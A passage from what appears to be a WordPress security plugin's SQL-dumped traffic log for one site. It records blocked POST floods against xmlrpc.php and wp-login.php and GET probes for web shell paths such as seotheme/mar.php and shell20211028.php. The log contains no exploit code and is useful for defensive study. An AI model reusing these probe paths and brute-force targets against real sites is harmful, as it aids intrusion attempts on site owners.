Safari\\/537.36\"}','2w5SHtsxgbqf9cFjBk8X67DO',0,1664294705.0591,15839,'','POST',403,0,515,0,1,'',0),('185.102.88.47',3110492207,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/64.0.3282.186 Safari\\/537.36\"}','FxnAo3h2CH9TIPVqkO0Zd167',0,1664294702.2454,18654,'','POST',403,0,515,0,1,'',0),('188.166.103.30',3165021982,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:36.0) Gecko\\/20100101 Firefox\\/36.0\"}','0B1piIGgxqk2JuHjNctlorew',0,1664294726.9713,507,'','POST',403,0,515,0,1,'',0),('188.68.47.69',3158585157,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:44.0) Gecko\\/20100101 Firefox\\/44.0\"}','SJZy4mKq7PY0jDzgXhQH9odr',0,1664294728.5762,533,'','POST',403,0,515,0,1,'',0),('82.165.86.16',1386567184,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko\\/20100101 Firefox\\/66.0\"}','wHynEzrKMl6F9SJhOYtDX7xQ',0,1664294750.5239,1332,'','POST',403,0,515,0,1,'',0),('60.205.227.183',1020126135,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/69.0.3497.100 Safari\\/537.36\"}','QWxoPMK6dUeyamzYjsItV3F9',0,1664294753.4506,483,'','POST',403,0,515,0,1,'',0),('116.202.117.198',1959425478,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-A102U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','dXofpDIEG8vR5LkBKz46ciYH',0,1664294756.1008,649,'','POST',403,0,515,0,1,'',0),('194.163.144.53',3265499189,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/88.0.4324.190 Safari\\/537.36\"}','5OfeF7CtYzNhx2UQguj0Wva6',0,1664294772.3048,524,'','POST',403,0,515,0,1,'',0),('139.59.150.45',2335938093,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/48.0.2564.109 Safari\\/537.36\"}','buIh2n4SA1O9vpkHjWZEds38',0,1664295316.3403,17595,'','POST',403,0,600,0,1,'',0),('69.163.186.158',1168358046,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.102 Safari\\/537.36\"}','Aal5x6SOsmoJzPuhbXqwKfjE',0,1664295338.6975,630,'','POST',403,0,600,0,1,'',0),('54.37.156.240',908434672,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.113 Safari\\/537.36\"}','P6nmcfzbXoILgeKF0OYHEau4',0,1664296447.9375,19667,'','POST',403,0,600,0,1,'',0),('47.115.24.165',796072101,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.109 Safari\\/537.36\"}','46pRV5IlGgfD8YuMSXczv1Or',0,1664296471.9933,444,'','POST',403,0,600,0,1,'',0),('82.165.86.16',1386567184,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko\\/20100101 Firefox\\/57.0\"}','XvqR0zciMkpmsBNVoEbdfTuw',0,1664297064.4482,15741,'','POST',403,0,515,0,1,'',0),('188.166.103.30',3165021982,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.102 Safari\\/537.36\"}','hrnFR5AZTqpoywB9bJ3Uz4cP',0,1664297062.4376,17860,'','POST',403,0,515,0,1,'',0),('128.199.195.166',2160575398,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.169 Safari\\/537.36\"}','VYTAIJescXEB2rhCURbZNdp8',0,1664297082.5680,573,'','POST',403,0,515,0,1,'',0),('103.109.209.136',1735250312,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-N960U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','1DsoxyAiJk08ewcEOdrK5lQq',0,1664297085.4768,570,'','POST',403,0,515,0,1,'',0),('36.92.166.178',610051762,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko\\/20100101 Firefox\\/85.0\"}','9H5eC4i7sFvSMGhq6cOLJRkw',0,1664297093.8771,1344,'','POST',403,0,515,0,1,'',0),('54.37.156.2',908434434,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; LM-Q720) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','WqGbAJ5v0QzOjkZcI14BrtR3',0,1664297096.9138,563,'','POST',403,0,515,0,1,'',0),('128.199.147.151',2160563095,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','RvLwz1AXBDSydYcjHxet7IW8',0,1664297098.8499,557,'','POST',403,0,515,0,1,'',0),('82.165.86.40',1386567208,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.90 Safari\\/537.36\"}','VBFflQcEuriUjmw5s0qWyzoY',0,1664297111.1511,646,'','POST',403,0,515,0,1,'',0),('139.99.125.19',2338553107,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','JGcwmNlBEerb9jDsztnVZiOx',0,1664297118.3927,558,'','POST',403,0,515,0,1,'',0),('45.79.120.96',760182880,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.121 Safari\\/537.36\"}','i2PgQ4Jkfx0npSMNXZhvw1qe',0,1664297121.7017,572,'','POST',403,0,515,0,1,'',0),('103.149.154.8',1737857544,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.132 Safari\\/537.36\"}','Qej68O0k4YthAb1RzfC3oUsJ',0,1664297570.3763,17730,'','POST',403,0,600,0,1,'',0),('178.217.190.82',3000614482,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/58.0.3029.110 Safari\\/537.36\"}','onDPvjfycMIVEGXOde9LCqwb',0,1664297592.4556,630,'','POST',403,0,600,0,1,'',0),('188.166.225.235',3165053419,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/47.0.2526.111 Safari\\/537.36\"}','5pZdLcUlQDnFE9mGk1BvJbiR',0,1664298675.5503,18296,'','POST',403,0,600,0,1,'',0),('47.96.74.105',794839657,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/47.0.2526.106 Safari\\/537.36\"}','D6IXMCaR9W3mvOlHd0tST8yp',0,1664298698.7792,4790,'','POST',403,0,600,0,1,'',0),('51.68.11.199',860097479,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:7.0.1) Gecko\\/20100101 Firefox\\/7.0.1\"}','GwfscZN3xrTPO549JDgiMhbC',0,1664299173.8011,15763,'','POST',403,0,515,0,1,'',0),('64.227.190.34',1088667170,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko\\/20100101 Firefox\\/78.0\"}','KbjRN20tozAs89MByYmdSeFi',0,1664299171.8256,17865,'','POST',403,0,515,0,1,'',0),('188.166.103.30',3165021982,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','cJCApT1KLkIu8nX5UgsvOa2t',0,1664299190.4464,509,'','POST',403,0,515,0,1,'',0),('128.127.106.229',2155834085,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.93 Safari\\/537.36\"}','nUBvRpXh5cZuQj2Jfik6A9VG',0,1664299196.0113,516,'','POST',403,0,515,0,1,'',0),('51.195.152.172',868456620,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko\\/20100101 Firefox\\/65.0\"}','PYJFvVInhB143qH6ft80i5kK',0,1664299208.0803,1065,'','POST',403,0,515,0,1,'',0),('68.183.26.89',1152850521,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:42.0) Gecko\\/20100101 Firefox\\/42.0\"}','4dYHDG78NUSInTbAmshFMvPJ',0,1664299211.5121,583,'','POST',403,0,515,0,1,'',0),('51.89.228.130',861529218,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:36.0) Gecko\\/20100101 Firefox\\/36.0\"}','Nzi4Xwlc1jh0dxn3OLHkVDSm',0,1664299218.4400,635,'','POST',403,0,515,0,1,'',0),('159.203.120.246',2680912118,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/78.0.3904.97 Safari\\/537.36\"}','XShre29boclyz870NZDnstEq',0,1664299765.4763,18044,'','POST',403,0,600,0,1,'',0),('208.109.54.127',3496818303,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.130 Safari\\/537.36\"}','qHNvWGTQxebD2gX7hoE6npZf',0,1664300841.5693,18112,'','POST',403,0,600,0,1,'',0),('51.38.192.91',858177627,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.163 Safari\\/537.36\"}','PYwTa5j94f6uBImcKUqgSnZW',0,1664300859.3136,917,'','POST',403,0,600,0,1,'',0),('220.85.221.65',3696614721,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (iPod; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit\\/605.1.15 (KHTML, like Gecko) CriOS\\/91.0.4472.80 Mobile\\/15E148 Safari\\/604.1\"}','TzkNL1JVXhYIp0DobHv9KxtR',0,1664301392.2091,7119,'','POST',403,0,515,0,1,'',0),('68.183.26.89',1152850521,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-A205U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','CA5OpGrzZ8BndY9muW4ePafb',0,1664301388.3543,10996,'','POST',403,0,515,0,1,'',0),('165.140.71.65',2777433921,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','Tu5nrZecLVJHI4joRBOtEl3k',0,1664301401.9568,480,'','POST',403,0,515,0,1,'',0),('185.107.113.41',3110826281,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko\\/20100101 Firefox\\/57.0\"}','X4WepS9loyRTzK3vnYtU2JkO',0,1664301407.5490,1252,'','POST',403,0,515,0,1,'',0),('51.77.159.184',860725176,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:33.0) Gecko\\/20100101 Firefox\\/33.0\"}','gzRsdL3nOfEPVC98HrmJahpW',0,1664301409.0047,468,'','POST',403,0,515,0,1,'',0),('109.235.66.248',1844134648,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko\\/20100101 Firefox\\/50.0\"}','sxjhvaG2lKpXcwUISBNmf14o',0,1664301417.7666,596,'','POST',403,0,515,0,1,'',0),('74.208.18.17',1255150097,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:61.0) Gecko\\/20100101 Firefox\\/61.0\"}','NaGCJWLhMyZDuvdrRwVnT2e3',0,1664301422.8776,510,'','POST',403,0,515,0,1,'',0),('36.92.166.178',610051762,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/64.0.3282.186 Safari\\/537.36\"}','5kyBivAwhG3XcSReMHoanrDf',0,1664301427.2650,1053,'','POST',403,0,515,0,1,'',0),('92.205.10.44',1556941356,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko\\/20100101 Firefox\\/43.0\"}','jzSMUu0aEtPvZ8RkY7sBKIhy',0,1664301427.6955,838,'','POST',403,0,515,0,1,'',0),('61.19.125.142',1024687502,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko\\/20100101 Firefox\\/43.0\"}','pdgYS7CQVs9crLEW4ohO0qjH',0,1664301433.6509,511,'','POST',403,0,515,0,1,'',0),('68.183.26.89',1152850521,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko\\/20100101 Firefox\\/54.0\"}','NiT54tzA1Jp8He9gGx7jEqoF',0,1664301441.4653,532,'','POST',403,0,515,0,1,'',0),('68.183.26.89',1152850521,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-G960U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','TkB6ytfL9KlH1PuJCZFOzasd',0,1664301445.1390,482,'','POST',403,0,515,0,1,'',0),('115.79.139.135',1934592903,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/54.0.2840.99 Safari\\/537.36\"}','kpW7RAFLwDyQ6jidKvczM0V3',0,1664301915.3905,17635,'','POST',403,0,600,0,1,'',0),('207.154.248.39',3483039783,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/64.0.3282.140 Safari\\/537.36\"}','FQHZhB9Snvrjq7slITJGNAx1',0,1664301938.5232,525,'','POST',403,0,600,0,1,'',0),('103.8.12.105',1728580713,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:17.0) Gecko\\/20100101 Firefox\\/17.0\"}','NYeQm86GWBtyfJ5sl9RoOKXU',0,1664302471.1851,4028,'','POST',403,0,515,0,1,'',0),('188.166.103.30',3165021982,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko\\/20050915 Firefox\\/1.0.7\"}','aIufdTSJUjeLEVrp1yqG9oBN',0,1664302457.0826,18135,'','POST',403,0,515,0,1,'',0),('3.111.174.159',57650847,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:7.0.1) Gecko\\/20100101 Firefox\\/7.0.1\"}','z0jmNdiEDlCJx9TfbRGq8HM1',0,1664302480.4726,1130,'','POST',403,0,515,0,1,'',0),('68.183.26.89',1152850521,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/46.0.2490.71 Safari\\/537.36\"}','R2NJI0vSpYM3TLQ8mqZ4jdD6',0,1664302481.0191,912,'','POST',403,0,515,0,1,'',0),('128.199.195.166',2160575398,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko\\/20100101 Firefox\\/18.0\"}','jtDKvQCki6dOVP41GBRX3pbh',0,1664302482.2692,492,'','POST',403,0,515,0,1,'',0),('203.156.136.113',3416033393,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-N960U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','bwRjhFGOK3t4Jx7sEQYvfiIy',0,1664302490.6782,1287,'','POST',403,0,515,0,1,'',0),('103.8.12.105',1728580713,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:36.0) Gecko\\/20100101 Firefox\\/36.0\"}','0PG6U3OlEQegmvYbjDftCJMo',0,1664302495.5999,631,'','POST',403,0,515,0,1,'',0),('82.165.88.207',1386567887,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/46.0.2490.71 Safari\\/537.36\"}','g7MA8JSUIDslLzVv3mcXKhWB',0,1664302503.7778,1424,'','POST',403,0,515,0,1,'',0),('185.93.165.224',3109922272,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.113 Safari\\/537.36\"}','UxgoAnsdCvliBeROIZfzHY8t',0,1664302504.4896,1047,'','POST',403,0,515,0,1,'',0),('69.163.196.200',1168360648,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/59.0.3071.115 Safari\\/537.36\"}','4sQljhqJMGTPDRoXNEIYKk2n',0,1664303008.5883,17741,'','POST',403,0,600,0,1,'',0),('188.165.198.224',3164980960,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/66.0.3359.117 Safari\\/537.36\"}','mUyPBMi90rhzSGdZOva2KblF',0,1664304100.4745,2527,'','POST',403,0,600,0,1,'',0),('188.166.183.39',3165042471,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/64.0.3282.167 Safari\\/537.36\"}','69V4cEsj8AKZDkyxPvGbJSoW',0,1664304124.9301,1407,'','POST',403,0,600,0,1,'',0),('64.42.179.67',1076540227,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','KObWfsdDH2n4VzU751IrgYAk',0,1664305000.3733,18399,'','POST',403,0,515,0,1,'',0),('34.65.234.0',574745088,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/65.0.3325.181 Safari\\/537.36\"}','Wsk8R9vagXdxDHIlhrKVEBJo',0,1664305222.6323,650,'','POST',403,0,600,0,1,'',0),('64.42.179.67',1076540227,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','Vjw7LlvKsX6MUyN0BSZbFhud',0,1664305389.8149,6277,'','POST',403,0,515,0,1,'',0),('176.9.113.101',2953408869,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko\\/20100101 Firefox\\/59.0\"}','FePaUBlDjTKdEJnuCRHWA6O5',0,1664305767.7681,15075,'','POST',403,0,515,0,1,'',0),('128.199.147.151',2160563095,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.132 Safari\\/537.36\"}','DWvBxTd53qgS1hGpkn0Ma9N4',0,1664305767.5225,15323,'','POST',403,0,515,0,1,'',0),('148.72.61.12',2487762188,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko\\/20100101 Firefox\\/66.0\"}','l7HBtRkv0SZE2J9sGC6efbxK',0,1664305793.1188,1483,'','POST',403,0,515,0,1,'',0),('217.116.205.56',3648310584,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/57.0.2987.133 Safari\\/537.36\"}','CMGghkZz8XB1HRa3YNUqo5jd',0,1664305792.7066,2403,'','POST',403,0,515,0,1,'',0),('92.205.10.44',1556941356,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/88.0.4324.104 Safari\\/537.36\"}','Fnktpred9yumjAzPIU0YZgs2',0,1664305803.0088,2587,'','POST',403,0,515,0,1,'',0),('208.109.68.254',3496822014,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-A205U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','TjmW9qsb8Fw0vN1i2eUxEokK',0,1664305804.8861,1644,'','POST',403,0,515,0,1,'',0),('36.92.166.178',610051762,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.88 Safari\\/537.36\"}','jrBHG1tkJSh0eVDYvw6u8qTO',0,1664305809.2593,668,'','POST',403,0,515,0,1,'',0),('97.74.82.165',1632260773,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','MmZpUr7SK6xCtPEhBDcaWI0i',0,1664305811.4904,671,'','POST',403,0,515,0,1,'',0),('160.16.210.199',2685457095,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:60.0) Gecko\\/20100101 Firefox\\/60.0\"}','cib3lPSLg6CkJWDQmR9yTsGI',0,1664305814.5324,703,'','POST',403,0,515,0,1,'',0),('57.128.45.42',964701482,'','http://cteisys.com/wp-content/themes/seotheme/mar.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','8evswNTGfIlW0krS7mbzZcnH',0,1664305958.3101,2452,'','GET',403,0,700,0,1,'',0),('57.128.45.42',964701482,'','https://cteisys.com/wp-content/themes/seotheme/mar.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','WC7Q53ziF6PhVxpl2ymEftJG',0,1664305966.6947,389,'','GET',403,0,700,0,1,'',0),('57.128.45.42',964701482,'','http://cteisys.com/wp-includes/shell20211028.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','C392DEi1AGzobXHwTYMncaZv',0,1664305984.8256,307,'','GET',403,0,700,0,1,'',0),('57.128.45.42',964701482,'','https://cteisys.com/wp-includes/shell20211028.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','1QsPr5NJSwTD64l9fgviRYGI',0,1664305992.6215,296,'','GET',403,0,700,0,1,'',0),('69.163.196.200',1168360648,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/87.0.4280.88 Safari\\/537.36\"}','n8j9D7LTJZmUKRQWaBkz4Ffc',0,1664306301.3553,18291,'','POST',403,0,600,0,1,'',0),('208.113.171.103',3497110375,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/81.0.4044.122 Safari\\/537.36\"}','qpbNBECnS19Wl0etGLQmr5fk',0,1664306325.5439,1385,'','POST',403,0,600,0,1,'',0),('69.163.224.107',1168367723,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/53.0.2785.143 Safari\\/537.36\"}','Rm3fpDyru1JEqChiScI7w50H',0,1664307415.1455,18024,'','POST',403,0,600,0,1,'',0),('141.94.247.170',2371811242,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/64.0.3282.167 Safari\\/537.36\"}','IgXtVvWYsoUlaFN9nGZ5DhdT',0,1664307439.3707,469,'','POST',403,0,600,0,1,'',0),('103.8.12.105',1728580713,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko\\/20100101 Firefox\\/88.0\"}','gRSja5sZxy2JA6OqUfLi0dHz',0,1664307870.9823,17385,'','POST',403,0,515,0,1,'',0),('87.117.247.34',1467348770,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.113 Safari\\/537.36\"}','Udrmq0PvNaF8K1VfSgtsZA75',0,1664307879.2181,9153,'','POST',403,0,515,0,1,'',0),('103.81.85.56',1733383480,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.93 Safari\\/537.36\"}','7wqrYfgRpByVF9Lvi035nPHz',0,1664307877.5341,11046,'','POST',403,0,515,0,1,'',0),('188.166.103.30',3165021982,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:17.0) Gecko\\/20100101 